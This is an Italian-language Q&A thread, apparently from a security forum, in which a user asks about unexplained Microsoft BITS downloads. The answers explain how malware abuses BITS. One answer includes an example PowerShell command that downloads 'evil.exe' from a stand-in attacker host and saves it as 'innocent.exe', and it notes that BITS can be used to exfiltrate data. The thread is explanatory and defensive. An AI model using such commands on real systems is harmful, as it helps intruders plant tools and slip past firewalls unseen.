Implicazioni sulla sicurezza di Microsoft BITS - Background Intelligent Transfer System: uso, abuso, limite e rimedio?

2

Uso Networx - per gestire e monitorare la connessione di rete della mia macchina. Mostra velocità di download reali e connessioni di rete attive.

Quindi, alcune volte all'improvviso ho ricevuto questi download e non stavo scaricando nulla, o utilizzando il browser e anche i miei aggiornamenti di Windows sono disabilitati.

Quindi Networks lo mostra come una connessione tramite BITS.

TCP PC-MACHINE-NAME: 1650
server-54-230-186-238.cdg51.r.cloudfront.net: https
ESTABLISHED 88.0 KB/s

Ma non avevo modo di vedere cosa stava scaricando BITS. Quindi, sono andato online e ho trovato alcune applicazioni basate su BITS.

Una di queste applicazioni chiamate BITS Download Manager mi mostra cosa sta effettivamente scaricando BITS.

https://clientupdates.dropboxstatic.com/Client/DropboxClient_xxVerNo.exe

  • Mi chiedo se le implicazioni sulla sicurezza di BITS vengano utilizzate e abusate in modo legittimo e illecito?

  • Inoltre, c'è un modo in cui possiamo disabilitare o limitare l'accesso ad esso in qualche modo, in una certa misura - come Rememdy?

posta Alex S 06.08.2016 - 13:41
fonte

2 risposte

2

I am wondering about the Security Implications of BITS being used and abused by legitimately and wrongful ways?

BITS di per sé non fornisce alcun tipo di sicurezza. È solo un servizio per fornire aggiornamenti e download di sfondo e qualsiasi tipo di sicurezza deve essere aggiunto utilizzando il protocollo pertinente (ad esempio http vs. https) o convalidando il contenuto trasferito nell'applicazione (cioè le firme).

Non ci sono privilegi speciali per usare BITS. Quindi è possibile che il malware utilizzi anche BITS e questo viene anche utilizzato nella pratica. Per ulteriori informazioni, fare semplicemente ricerca o vedere ad esempio Malware Lingers con BITS :

Malware authors and intruders have abused the service since at least 2007.

    
risposta data 07.08.2016 - 07:53
fonte
1

Hai ragione a chiedersi. È possibile che un utente malintenzionato ottenga un accesso di comando a un sistema per pianificare lavori BITS arbitrari :

Uso di Windows PowerShell per creare processi di trasferimento BITS

Fornendo loro un modo semplice e non GUI per scaricare i loro strumenti sul sistema:

Start-BitsTransfer -Source http://evil.com/tools/evil.exe -Destination C:\tmp\innocent.exe

Poiché BITS è optato per un download silenzioso in background, questo è un modo in cui un utente malintenzionato può catturare i propri file (a condizione che nessuno stia guardando NetWorx sul proprio computer quiescente). Ha anche il vantaggio che se esiste un software "firewall personale" in uso che limita l'accesso a Internet ai programmi approvati, beh, BITS è un programma approvato.

BITS può anche essere utilizzato per caricare file ( alcuni esempi qui ) oltre a scaricarli. Quindi può essere usato per exfiltrare (rubare) i dati e anche per scaricare strumenti.

    
risposta data 06.08.2016 - 15:50
fonte

Leggi altre domande sui tag